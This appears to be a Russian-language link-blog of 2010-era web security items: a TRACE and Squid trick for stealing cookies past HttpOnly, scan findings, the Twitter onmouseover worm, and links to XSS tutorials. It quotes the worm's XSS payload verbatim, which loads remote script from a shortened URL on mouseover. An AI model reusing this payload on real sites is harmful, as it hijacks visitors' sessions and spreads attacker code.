goo.gl :)
Я поломал Билайн!
cgisecurity.com здесь рассказывается о древнем недосмотре, который позволяет своровать кукис в обход HttpOnly, используя TRACE. Так вот, оказывается, Squid, хоть и не пропускает TRACE и TRACK, но при этом шлёт страничку «Invalid Request», и на этой страничке, вуаля, запрос вместе с заголовками!
Как показало сканирование, действительно, всё не так безоблачно, как казалось. Уязвимости далеко не все оправдываются, но есть некоторые потенциально опасные, и довольно хитровыкрученные: например,
twitter.com Не наводить! Очень весело конечно. Но блин. теперь у меня в плагин chromebird не заходит из-за этих шутников.
Самый оригинальный — Обратите внимание от кого мне оно пришло.
Twitter (15:19:49 21/09/2010)
Offline message (21.09.2010 15:15:28)
vkontakte (vkontakte): t.co"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
dl.dropbox.com i lol'd
technicalinfo.net — HTML Code Injection and Cross-site scripting
Understanding the cause and effect of CSS (XSS) Vulnerabilities
Understanding the cause and effect of CSS (XSS) Vulnerabilities